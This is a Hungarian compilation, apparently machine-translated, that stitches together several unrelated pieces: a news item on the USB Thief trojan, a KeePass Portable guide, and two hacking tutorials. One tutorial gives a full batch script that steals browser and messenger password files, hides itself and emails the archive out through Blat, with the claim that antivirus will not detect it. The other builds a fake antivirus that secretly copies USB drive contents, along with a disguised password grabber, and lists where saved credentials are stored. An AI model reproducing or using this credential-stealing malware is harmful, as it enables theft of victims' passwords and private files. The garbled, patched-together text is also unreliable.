Egy rendkívül szokatlan trójai: a kártevő az USB Thief (Win32/PSW.Stealer.NAI) nevet kapta. A rosszindulatú program az adatok ellopására koncentrál, hétköznapi flash meghajtókon terjed és működik, emellett ügyesen elrejti jelenlétének nyomait a rendszerben. A trójai ideális kiberkémkedésre, hiszen akár a hálózattól elszigetelt rendszereket is elérheti, ha USB-meghajtó csatlakoztatható hozzájuk.
Ellentétben más USB-fenyegetésekkel, amelyek az indításhoz tapadnak, és alkalmazások parancsikonokat hamisítanak a rosszindulatú program elindításához, az USB Thief másként működik. A trójai célja, hogy kihasználja azt a tényt, hogy a felhasználók gyakran tárolnak olyan alkalmazások hordozható verzióit, mint a Firefox, NotePad++, TrueCrypt stb. A rosszindulatú programok szépen beépülnek az ilyen programok letöltési láncába, beépülő modulként, ill DLL fájl. Így amikor a felhasználó elindít egy ismerős alkalmazást egy flash meghajtóról, azzal együtt (a háttérben) elindul egy trójai.
A kártevő ismeretlen szerzője komoly védelemről gondoskodott fejlesztése érdekében. Az USB Thief minden fertőzött flash meghajtóhoz kötődik az egyedi azonosítójuk és a meghajtóbeállítások használatával. A trójai állományok egy részét AES128 titkosítás védi, a kulcsot pedig az eszköz egyedi paraméterei alapján állítják elő. A kártevő fájlok neve is minden esetben eltérő: a flash meghajtó tartalma és a fájlok létrehozásának időpontja alapján jönnek létre. Amikor megpróbálja átmásolni az USB Thief-et egy másik flash meghajtóra, ill normál kemény lemez, ez a kétlépcsős védelmi rendszer megakadályozza a rosszindulatú programok működését, és komolyan megnehezíti a visszafejtést is.
trójai szerkezet
Az USB Thief közvetlenül a flash meghajtóról működik, és nem hagy nyomot magán a rendszeren. A trójai hat fájlból áll, amelyek közül négy futtatható, kettő pedig konfigurációs adatokat tartalmaz. Az első betöltő felelős a trójai program elindításáért a program hordozható verziójával együtt. Ellenőrzi az USB-eszközt, és megbizonyosodik arról, hogy az ellopott információkat képes ráírni és itt tárolni. Ezután elindul a második rakodó. Ellenőrzi a szülő folyamatok nevét, és megbizonyosodik arról, hogy normál környezetben fut (és senki sem próbálja elemezni). A harmadik betöltő viszont ellenőrzi, hogy vannak-e antivírusok a rendszerben.
Az utolsó, negyedik hasznos teher, amely be van ágyazva futó folyamat, közvetlenül felelős az adatlopásért. Az USB Thief ellopja a dokumentumokat, képeket, fájllistát az összes elérhető meghajtóról, adatokat Windows rendszerleíró adatbázisés a WinAudit által gyűjtött információk. Minden ellopott adatot egy flash meghajtón tárolnak, és elliptikus kriptográfia segítségével titkosítják.
Az ESET szakértői megjegyzik, hogy a támadások a USB használatával A tolvaj még nem bevett gyakorlat. A trójai azonban nagyon veszélyes, mivel nehéz észlelni a jelenlétét, és az USB-meghajtó eltávolítása után egyáltalán nem marad nyoma az információlopásnak. A cég jelentésében az is szerepel, hogy a kártevő szerzője, ha kívánja, „újrahasznosíthatja” kártevőjét úgy, hogy az adatlopás céljára szolgáló rakományt bármilyen más kártevővel helyettesíti.
Ebben a cikkben leírom, hogy milyen gyorsan és különösebb nehézségek nélkül írjon és készítsen egy vírust, amely jelszavas fájlokat lop el, és mindezt a postafiókba küldi.
Kezdjük azzal, hogy a vírus bat "e-vel lesz írva (CMD, az alapparancsokat veheted), vagyis a szokásos szöveges fájlés a szabványos, beépített Windows interpreter - "parancssor" segítségével kerül végrehajtásra.
Ahhoz, hogy egy ilyen vírust írhasson, ismernie kell az ellopni kívánt fájlok pontos tárolási helyét, a Blat összetevőket, amelyek letölthetők a http://www.blat.net/ oldalról vagy a szerverünkről, pl. valamint a WinRaR archiváló Rar.exe egy komponense (enélkül is megteheti).
Nyissa meg a Jegyzettömböt, és másolja be a következő kódot:@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Jelszó ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -a [email protected] címre - csatolja a %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Magának a Batinka kódjáról nem írok sokat.
@echo off - elrejti a fenék testét (tehát nem kell, de mégis)
md %systemroot%\wincs - létrehoz egy wincs mappát rendszermappa Windows, függetlenül attól, hogy melyik meghajtóra van telepítve vagy mi a neve.
md %SystemDrive%\pass\ – egy pass mappát hoz létre azon a meghajtón, amelyre a Windows telepítve van.
md %SystemDrive%\pass\opera\ - létrehozza az opera mappát, ahonnan a wand.dat és a cookies4.dat Opera böngésző(11* verzióig az opera a jelszavait a wand.dat fájlban tárolja)
md %SystemDrive%\pass\Mozilla\- létrehoz egy Mozilla mappát, ahol a fájlok Mozilla böngésző(cookies.sqlite ,key3.db ,signons.sqlite ), amelyben a jelszavak tárolásra kerülnek.
md %SystemDrive%\pass\MailAgent\- létrehoz egy MailAgent mappát, amelybe a levelezési előzményeket és a rendszerleíró kulcsokat (jelszavakat tároló) tartalmazó fájlok másolásra kerülnek.
md %SystemDrive%\pass\MailAgent\reg- létrehoz egy mappa reg
attrib %systemroot%\wincs +h +s +r- attribútumokat helyez el a wincs mappába, ezáltal elrejti a látás elől.
attrib %SystemDrive%\pass +h +s +r- ugyanaz, mint fent.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- átmásolja a blat.exe fájlt a letöltési helyről a wincs mappába
másolat /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- átmásolja a blat.dll fájlt a letöltési helyről a wincs mappába
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- átmásolja a blat.lib fájlt a letöltési helyről a wincs mappába
CD /D %APPDATA%\Opera\Opera\ - az opera mappába lép, ahol az operából származó jelszavas fájlok (és nem csak) találhatók.
másolja a /y wand.dat %SystemDrive%\pass\opera\wand.dat fájlt- bemásolja a wand.dat fájlt az opera mappába
másolja /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- átmásolja a cookie4.dat fájlt az opera mappába
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exportálja a jelszót tartalmazó magent_logins2 rendszerleíró kulcsot a reg mappába
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exportálja a jelszót tartalmazó magent_logins3 rendszerleíró kulcsot a reg mappába
CD / D %APPDATA% - lépjen az AppData mappába
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- átmásolja az Mra\Base mappa tartalmát a MailAgent mappába
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- a ver.txt fájlt a MailAgent mappába másolja
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- lépjen a Mozilla böngészőprofillal rendelkező mappába
másolja /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- a cookies.sqlite fájlt a Mozilla mappába másolja
másolja /y key3.db %SystemDrive%\pass\Mozilla\key3.db- a key3.db fájlt a Mozilla mappába másolja
másolja /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- a signons.sqlite fájlt a Mozilla mappába másolja
másolja /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- átmásolja a WinRar Rar.exe archiváló komponenst a pass mappába
del /s /q %SystemRoot%\Rar.exe- eltávolítja az archiváló összetevőt a Windows mappából
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archiválja a pass mappa tartalmát
másolás /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar másolja a létrehozott archívumot a wincs mappába
cd %systemroot%\wincs - lépjen a wincs mappába
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -587-es port -f [email protected] -u login -pw Jelszó - felkészíti a Blat programot az archívum elküldésére az engedélyezéshez és a levél elküldéséhez szükséges adatok megadásával. Ne felejtse el megadni adatait abból a postafiókból, ahonnan az archívumot tartalmazó levél érkezik küldött.
ren *.rar pass.rar - arra az esetre, ha az archívum nem vett fel rossz nevet a folyamat során, újra átnevezzük pass.rar-re
%systemroot%\wincs\blat.exe -body Fájlok Jelszó -hoz [email protected] - csatolja a %systemroot%\wincs\pass.rar-t- jelezze, hogy melyik postacímre küldi a levelet, és küldje el.
rmdir /s /q %SystemDrive%\pass- törölje a pass mappát
rmdir /s /q %systemroot%\wincs- törölje a wincs mappát
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- távolítsa el a Blat összetevőket a Windows mappából.
del /s /q %systemroot%\blat.lib- távolítsa el a Blat összetevőket a Windows mappából.
attrib +a +s +h +r %systemroot%\wind.exe- attribútumokat öltünk magunkra, ezzel elrejtőzve a szem elől.
EXIT – fejezze be a töltési folyamatot, és lépjen ki.
cls - törölje a kimenetet az intraperátorban lévő soroktól.
Másolt, mentse wind.bat néven, és fordítsa le az exe segítségével Denevér programok exe konverterhez, akkor mindent összegyűjtünk, vagyis vesszük a Blat program komponenseket és a WinRar archiváló komponenst (le lehet tölteni) és egy futtatható fájlba ragasztjuk, vagy valamilyen programmal az összes fájl kiürítésének elérési útját kell be% SystemRoot% vagy% WindowsDir% vagy %windir% .
Ennek eredményeként olyan vírust kapunk, amelyet nem lőnek ki az antivírusok, és egy archívumot küld a leveleire fájlokkal.A levélre érkező fájlok többszörös jelszó-helyreállítással dekódolhatók, bár nem mindegyik, hanem csak pálcával .dat az operából, majd ha nem lett frissítve 11 * verzióra.Az összes többi fájl visszafejthető, ha lecseréli a sajátjára.
Szerintem itt a vége, ha bármi kérdésed van tedd fel nyugodtan.
Köszönöm a figyelmet, minden jót!
©Swap TheHackWorld.in
Sok cég, köztük a Sony és az Adobe, máris olyan hackerek áldozatává vált, akik több millió jelszót és egyéb felhasználói adatot loptak el. Ezen információk elemzése azt mutatta, hogy sok felhasználó gyakran használ gyenge jelszavakat, például „123456”, vagy ugyanazt a jelszót számos szolgáltatáshoz. Ez nagymértékben megkönnyíti a hackerek feladatát, és egyúttal az ilyen figyelmetlenséget is meg lehet érteni: ki az, aki képes megjegyezni egy tucatnál több összetett jelszót?
Egyszerű megoldás lehet a billentyűzet alá ragasztott papírdarab. Egyetlen hacker sem fog tudni behatolni rá, de folyamatosan figyelnie kell a számítógépe közelében tartózkodó embereket. És ez a lap nem használ, ha valaki más számítógépéről szeretne bejelentkezni a fiókjába.
Az ingyenes KeePass 2 Portable eszköz megoldja ezt a dilemmát. Működéséhez csak egy 10 MB szabad hellyel rendelkező USB flash meghajtóra van szüksége, amelyre egy segédprogramot telepít. A jövőben csak egy jelszót kell megjegyeznie - a flash meghajtó védett területéről. Hiszen benne a KeePass elmenti a bejelentkezési adatokat a webszolgáltatásaiba egy kódolt adatbank formájában, amelyet mester jelszóval védenek.
A jelszavakat lopó trójaiak nem tudnak semmit kiszimatolni. És mivel többé nem kell több tucat jelszót észben tartania, minden webszolgáltatáshoz használhat egy újat, erős jelszó. Most részletesen elmondjuk, hogyan kell használni a KeePass-t.
Hogyan kell csinálni
1 Telepítsen jelszavas széfet
Telepítsen jelszavas széfet
Helyezzen be egy USB flash meghajtót a számítógépbe, hozzon létre egy új mappát rajta, és másolja oda az archívum tartalmát a KeePass szoftverrel. Futtassa a KeePass.exe programot. Indítás után aktiválja automatikus keresés frissítéseket az "Engedélyezés" gombra kattintva a felugró ablakban. Ezután válassza a „Nézet | Nyelv módosítása” lehetőséget, majd kattintson a „További nyelvek beszerzése” gombra.
Töltse le az orosz nyelvű fájlt a webhelyről, amely megnyílik az „Orosz | 2,25+". Bontsa ki az archívum tartalmát egy USB-meghajtóra. Kattintson újra a "Megtekintés | Nyelv módosítása, válassza az "Orosz" lehetőséget, és indítsa újra a KeePass-t az "Igen" gomb megnyomásával.
2 Hozzon létre egy új jelszó adatbázist
Hozzon létre egy új jelszó adatbázist
Válassza a "Fájl | New", és adja meg az USB-meghajtót jelszótárolóként. A következő ablakban a program felkéri a fő jelszó megadására. Minden alkalommal meg kell adnia a KeePass elindításakor.
3 Aktiválja a Védett módot
Aktiválja a Védett módot
Ha meg szeretné akadályozni, hogy a trójai beolvassa a KeePass jelszavát, használja a program védett módját a jelszó megadásához, hasonlóan a Windows 7 UAC-hoz. Ehhez lépjen a KeePass-ban az „Eszközök | Beállítások | Biztonság”, lépjen az ablak aljára, és jelölje be a „Fő jelszó megadása biztonságos módban” melletti négyzetet.
4 Töltse fel az adatbázist jelszavakkal
Töltse fel az adatbázist jelszavakkal
A KeePass képes csoportokba rendezni a jelszavakat. Alapértelmezés szerint az új jelszóbank olyan csoportokat tartalmaz, mint az "OS" vagy az "Internet". Készíteni új bejegyzés, válassza ki a megfelelő csoportot (vagy hozzon létre egy újat), kattintson a jobb gombbal a jobb oldali fehér területre, majd kattintson a "Bejegyzés hozzáadása" gombra.
Töltse ki az összes mezőt, és kattintson az OK gombra. Mivel már nem kell emlékeznie jelszavakra az egyes fiókokba való bejelentkezéshez, beállíthat új, összetettebb jelszavakat, amelyek generálhatók például a passwort-generator.com oldalon.
5 Használjon automatikus hitelesítést
Ha KeePass használatával szeretne bejelentkezni a szolgáltatásba, nyissa meg a csoportot, ahol a megfelelő jelszót tárolja. Jobb klikk kattintson az egérrel a megfelelő tárolási bejegyzésre KeePass jelszavakés a legördülő listából válassza az "Automatikus tárcsázás indítása" lehetőséget. Ezt követően a program átviszi az adatait a böngészőbe, és a böngésző egy új ablakot nyit meg, ahol bejelentkezik a fiókjába.
Kérjük, vegye figyelembe, hogy az "URL" mezőben meg kell adnia azt az URL-t, amelyet a böngészőben általában megad az engedélyezéshez, ellenkező esetben az automatikus jelszóbevitel a KeePass-on keresztül nem működik.
6 Bővítse KeePass élményét
Hosszabbítsa meg a KeePass-t
Ha ki szeretné bővíteni a KeePass funkcióit, lépjen az "Eszközök | Modulok | További modulok”, amely után átirányítjuk a(z) oldalra hasznos bővítmények(ajánlásaink a fenti táblázatban találhatók). Most a bővítmény nevére kattintva töltse le és bontsa ki egy flash meghajtóra.
Indítsa újra a KeePasst, és lépjen az Eszközök | Modulok. Az elérhető bővítmények listája alul jelenik meg (néhány közülük konfigurálható).
A legjobb KeePass bővítmények
Szerelje fel széfjét jelszavakkal további jellemzők, például a függvény Tartalékmásolat vagy jelszó továbbítása mobiltelefonokhoz.
Név |
Leírás |
| DataBaseBackup | Jelszavas bankvédelmet állít be az USB-meghajtó ellopása vagy elvesztése esetére. |
| Twofish Cipher | |
| KeeAgent | Olyan kódolási algoritmust ad hozzá, amelyet szinte lehetetlen feltörni; vegye figyelembe, hogy így a KeePass lassabb lesz. |
| KeyExchanger | Olyan kódolási algoritmust ad hozzá, amelyet szinte lehetetlen feltörni; vegye figyelembe, hogy így a KeePass lassabb lesz. |
| KeeForm | Egyetlen gombnyomással megnyitja kedvenc webhelyeit, és automatikusan kitölti bejelentkezési adatait. |
Egyszerű halandók számára a flash meghajtó dokumentumok / filmek / fényképek és egyéb személyes (és néha nagyon személyes) adatok átvitelére szolgáló eszköz. De a hackerek számára a pendrive egyszerre áldozat és harci eszköz. Ma elmondom neked a flash meghajtókról a számítógépemre való észrevehetetlen adatok kiürítésének minden finomságát, és azt is megtanítom, hogyan alakítsd át az ártalmatlan flash meghajtókat a jelszavak biztonsági mentésére szolgáló programokká egy „nagy” számítógépről.
Csapda mások pendrive-jainak
Az "Evil Computer" program ötlete a következő lesz. Kifejlesztünk egy kis eszközt, amely egy szupermega fejlett vírusirtónak adja ki magát, és amelynek célja a „veszélyes” vírusok minőségi eltávolítása a flash meghajtókról. Vírussal fertőzött pendrive-val senkit nem fog meglepni, így speciális „vírusirtónk” nem okoz aggodalmat a hiszékeny felhasználóban. Éppen ellenkezőleg, ha USB flash meghajtót helyez be a számítógépbe, és megjelenik egy ilyen üzenet: "Vírus észlelve. Részletesen megvizsgálom az összes fájlt fertőzöttek jelenlétére, - mindenképpen megvárja ennek a műveletnek a befejezését.
Hangszer előkészítés
írj így hasznos program a most divatos C#-n leszünk. A nyelv rugalmassága és a .NET platform gazdag funkcionalitása lehetővé teszi az alkalmazások villámgyors fejlesztését. Pontosan erre van szükségünk. Bennünket a betakarítás érdekel, nem a kódolás unalmas folyamata.
Alkalmazásunk egyik fontos összetevője az interfész lesz. Minél masszívabban csinálja, annál valószínűbb, hogy az áldozat nem veszi észre a fogást, és nyugodtan várja a víruskereső vizsgálat befejezését. Nem foglalkoztam túl sokat, és csak egy képet és egy ProgressBar-t helyeztem el egy tiszta projekt formájában. Jól érezheti magát, és észbontó dizájnt készíthet. Azt tanácsolom, hogy nézze meg egy igazi vírusirtó dizájnját, és tervezze meg alkalmazását megközelítőleg ugyanabban a stílusban.
Kitűztük a feladatot
Feltételezzük, hogy eldöntöttük a szervezési kérdéseket és a cselekvés algoritmusát, ideje megvitatni a technikai árnyalatokat. Tehát a víruskeresőnknek meg kell kezdenie piszkos munkáját a flash meghajtó telepítése során. Egyszer új lemez megjelenik a rendszerben, programunknak meg kell határoznia a betűjét, és el kell kezdenie a másolást.
Mielőtt elvállaltam volna ennek a cikknek a megírását, egy ilyen program forráskódjára bukkantam. A példa szerzője úgy határozta meg a flash meghajtó jelenlétét, hogy rendszeres időközönként felsorolta az összes lemezt a következő típusú meghajtó jelenlétére vonatkozóan. cserélhető adathordozó". Először arra gondoltam, hogy ugyanígy járok, de egy belső hang irracionalitást sugallt. Miután mérlegeltem az összes "profikot" és az összes "jó, már van", elvetettem ezt az ötletet, és sétáltam az MSND-n. Öt perccel később kiderült, hogy jó okkal tettem. A válasz megvan!
WinAPI nélkül sehol...
Az új berendezések (esetünkben a flash meghajtók) csatlakoztatásának leghatékonyabb módja a WM_DEVICECHANGE üzenet elkapása és elemzése. A készülék telepítése során minden ablakba eljut az üzenet, amit az alkalmazásunkban egyszerűen feldolgozhatunk. Ehhez elég a WindowProc függvény leírása. A gyakorlatban ez így néz ki:
LResult CALLBACK WindowProc (HWND hwnd, //ablakazonosító UINT uMsg, //üzenetazonosító WPARAM wParam, //esemény, amely bekövetkezett LPARAM lParam //mutató az adatokat tartalmazó szerkezetre)
A függvény törzsében össze kell hasonlítani a WParam paraméter értékét a WM_DEVICECHANGE üzenethez kapcsolódó különféle események azonosítóival. A mi példánkban ezek lennének:
Oké, tudjuk, hogyan állapítható meg az új berendezés csatlakoztatásának ténye, de hogyan lehet biztos abban, hogy USB flash meghajtót csatlakoztatott? Nagyon sok üzem közben csatlakoztatható eszköz van (usb-ről beszélek) (nyomtató, szkenner, modem stb.). Szerencsére ez a probléma egyszerűen megoldódik. Az LParam paraméter használatával hivatkozhatunk a _DEV_BROADCAST_HDR struktúrára, amelynek dbch_devicetype mezője van. Itt ennek a mezőnek az értéke alapján levonjuk a megfelelő következtetéseket. Ha egyenlő a DEV_DEVTYP_VOLUME értékkel, akkor itt az ideje, hogy örüljünk és tapsoljunk – egy pendrive csatlakozik hozzánk!
Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //DWORD szerkezet mérete dbch_devicetype; //Eszköz típusa DWORD dbch_reserved; //Fenntartva, nem használt )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
Egy USB flash meghajtót helyeztünk a pisyukunkba - próbáljuk meg kideríteni a meghajtó betűjelét, amelyet a rendszer hozzárendelt. Akárcsak a "Csodák mezejében", kitalálhatod, de jobb, ha a DEV_BROADCAST_VOLUME struktúrából húzod ki az információkat.
Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //DWORD szerkezet mérete dbcv_devicetype; //Eszköz típusa DWORD dbcv_reserved; //Fenntartott DWORD dbcv_unitmask; //Meghajtóbetűjel bitmaszk WORD dbcv_flags; // EVBROADC, *AST_PDV_BROADC,
A struktúra összes mezője közül a dbcv_unitmask érdekel bennünket. Vegye figyelembe, hogy ez a tulajdonság a betűnek csak egy részét tartalmazza, a szimbolikus ábrázolását nem. Például, ha az érték 0, akkor a meghajtó betűjele A lesz; ha 1, akkor B stb. A szimbolikus betűk megszerzésének kényelme érdekében a legjobb függvényt írni.
Ha már régóta olvassa rovatunkat, és ismeri az API-funkciókat, akkor nem kell elolvasnia a cikk következő részét. Nyissa meg a szerkesztőt, és kezdje el az alkalmazások szobrászatát. Leírtam az összes szükséges struktúrát és funkciót; csak össze kell őket rakni a programban. Döntsd el, és elkezdek búvárkodni a .NET-ben és különösen a C #-ban.
Nyomjuk meg a .NET "ohm
Ideje elkezdeni gyakorolni és alkalmazni tudását a C# nyelvre. "Mi a fene? - kérdezed. - A cikk felét a WinAPI-ról beszéltem, de aztán egyszerűen úgy döntöttem, hogy natív kód formájában meghívom az összes függvényt? Hol van a fejlődés állítólagos villámgyorsasága?
Valamiben igazad van. Alkalmazásunk valóban használni fogja a WinAPI függvényeket (nem egyszerűbb mód), de mi magunk nem írjuk le őket. Sok fejlesztő szembesült a flash meghajtók meghatározásának problémájával. Ezen ütközések eredményeként megjelentek a C # ingyenes osztályok, amelyekben már minden szükséges funkciót megvalósítottak. Csak csatlakoztatnunk kell egy ilyen üres (olvasott komponenst) a projektünkhöz, és meg kell hívnunk néhány metódust. Most ezen osztályok egyikét fogjuk használni. De a fent leírt struktúrák ismerete mindenképpen hasznos lesz a program Windows API-ra történő portolásakor.
Nagyon sok kész osztály van, ami ilyen problémákat old meg, de nekem Jan Dolinay verziója tetszett a legjobban. Ez a személy írt egy nagyon könnyen használható és érthető DriveDetector osztályt, amely:
És ami a legfontosabb, ezzel az osztállyal rendkívül könnyű dolgozni – ezt most látni fogod. Egy osztály csatlakoztatása a projekthez szabványos módon történik, és nincs értelme ezen elidőzni. Tehát folytassuk az inicializálást. Ez így történik:
FlashDriveDetector = new DriveDetector(); flashDriveDetector.DeviceArrived += new DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += új DriveDetectorEventHandler(OnDriveRemoved);
A DriveDetector osztály egy objektumának példányosítása után meghatározom a DevieArrived() és DriveRemoved() eseménykezelőket. A nevük alapján nem nehéz kitalálni, hogy miért felelősek. Az összes inicializálási kódot legjobban a Form1() metódussal lehet megírni. Programunk fő kódja a DeviceArrived eseménykezelőben lesz. Szövegét láthatjátok az oldalsávban:
String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("nn-MM-yy-hh-mm-ss"); CreateDirectory(könyvtárnév); xDirectory flashcopier = new xDirectory(); flashcopier.IndexComplete += new IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += new CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Cél = new DirectoryInfo(dirName); flashmásoló.Felülírás = igaz; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Más szűrők meghatározása //.... flashcopier.StartCopy();
A felsorolás legelején megadom annak a mappának az elérési útját, ahová a flash meghajtó tartalmát másoljuk. Átmásoljuk a „flash_current date” könyvtárba, amely az alkalmazásunk indításakor található mappával együtt található - ez kényelmesebb. Miután eldöntöttem a mappa nevét, megpróbálom létrehozni a CreateDirectory() függvény segítségével. Ezt a függvényt kizárólag a kényelem kedvéért írtam. Létrehozza a DirectoryInfo objektum egy példányát, amelyet úgy terveztek, hogy könyvtárakkal dolgozzon, és meghívja a Create () metódust, amely egy új mappát hoz létre.
A mappa létrehozása után másolhatja. Az összes fájlt egy xDirectory típusú objektum segítségével másolom. Ha saját maga írja be a listából a kódot, akkor a fordítási kísérlet során a fordító hibát generál, amelyben fekete-fehéren a következőt írja ki: "Ilyen típusú objektum nem található."
A lényeg az, hogy az xDirectory egy harmadik féltől származó osztály. Egyszer régen az interneten találtam rá, és azóta is gyakran használom projektjeimben. Tetszik, mert elég egy metódust meghívni az almappák másolásához. Ezenkívül lehetővé teszi szűrők beállítását.
Tényleg nélküle. Szabványos osztályokat veszünk, egy minden programozó által jól ismert technikát - a rekurziót - és írunk néhány tucat sornyi kódot. Jaj, ezt végképp nem akarom csinálni. A 21. század az udvaron, maximálisan optimalizálnunk kell cselekvéseinket, és az xDirectory ebben segíteni fog.
Az osztállyal rendelkező modul a lemezünkön van, a metódusok/tulajdonságok/események céljáról pedig a megfelelő táblázatból tájékozódhat.
Az xDirectory osztály tulajdonságai
xDirectory Class Methods
Próbálja meg futtatni az alkalmazásunkat, és helyezzen be egy flash meghajtót. Néhány másodperc múlva (a pendrive-od rendetlenségétől függően) az usb meghajtó összes tartalma átkerül abba a mappába, ahonnan a frissen sült alkalmazást elindítottad.
USB markoló
Most nézzük meg az inverz problémát, és beszéljünk az ún. flash meghajtó markoló. A teremtés elve pontosan ugyanaz. Egy egyszerű alkalmazást kell írnia, amely a flash meghajtó telepítése után automatikusan elindul.
A munka során az alkalmazás átmegy a mappákon / rendszerleíró kulcsokon, amelyekben a népszerű programok tárolják a mentett jelszavakat, és ha lehetséges, az összes információt átmásolják valamelyik mappájukba. Annak érdekében, hogy az automatikus futtatás ne keltsen gyanút a szegény felhasználóban, vegye a fáradságot és gondosan álcázza azt. Például az indítómenü alatt.
Valószínűleg Ön is tudja, hogy az alkalmazások úgynevezett hordozható verziói mára nagyon népszerűvé váltak, vagyis azok a programok, amelyek közvetlenül a pendrive-ról is működhetnek. Ez a legjobb játékmód. Tervezze meg a programot a megfelelő stílusban, és a hihetőség kedvéért dobjon be néhány gombot, amelyek bármilyen program elindítására szolgálnak. Az én tervem a képen látható.
Hogyan fogunk rabolni?
Azonnal meg kell mondanom, hogy itt nincs szükség szuperhacker-akciókra. A legtöbb program a személyes adatokat a Documents and Settings\User\Application Data\%ProgramName% mappában vagy a rendszerleíró adatbázisban tárolja. A ProgramName bármilyen programot jelent. Ha szembesül az első lehetőséggel, akkor a már ismert xDirectory osztályt (vagy szabványos fájlokkal való munkavégzési módszereket) kell használnia, és mindent át kell másolnia, amire szüksége van. A második esetben a rendszerleíró adatbázissal kell dolgoznia. Nem mondok példát a fájlok másolására (ezt már megfontoltuk), de megmutatom, hogyan kommunikálhat a rendszerleíró adatbázissal .NET-eszközök használatával (a TC mappa elérési útjának meghatározásával).
RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" software\\Ghisler\\ Total Commander"); string kulcs = (karakterlánc) readKey.GetValue("InstallDir");
Ez minden. Nem lesz több kód. Ennek a tudásnak elegendőnek kell lennie ahhoz, hogy értékes információkat tartalmazó fájlokat húzzon ki. Hogy megkönnyítsem a dolgokat, összeállítottam egy listát a legtöbbről népszerű programokés felfestették az összes módot, ahogyan tárolják a mentett felhasználói adatokat.
Mail.Agent
A Mail.ru Messenger ma már nagyon népszerű az egyszerű halandó felhasználók körében (főleg a nők körében). A célok világosak, a feladatok ki vannak tűzve, ezért érdeklődünk:
gTalk
Vállalat Google kényelmes és funkcionális termékeket hoz létre, amelyek között van egy gabber ügyfél - gTalk. Ma gTalk még nem túl népszerű. Nincs minden második PC-re telepítve, de néha mégis előfordul, és hogy a témában legyünk, jobb, ha azonnal megtanítjuk a programunkat, hogy ebből a messengerből is szerezzünk jelszavakat. Az összes gTalk-fiók jelszavait a rendszerleíró adatbázis tárolja: HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts. Ez az ág felsorolja az összes fiókot, amelybe valaha is bejelentkezett gTalk. A fiók jelszavait a rendszer tárolja karakterlánc paraméter pw.
Total Commander
Total Commander- messze a legnépszerűbb fájl kezelő. A program hozzávetőlegesen egy kocsit és egy kis kocsit tartalmaz (és ugyanannyit lehet hozzá csatolni további beépülő modulok segítségével). Minket csak a beépített FTP kliens érdekel. Sokan használják, a jelszavakat természetesen elmentik.
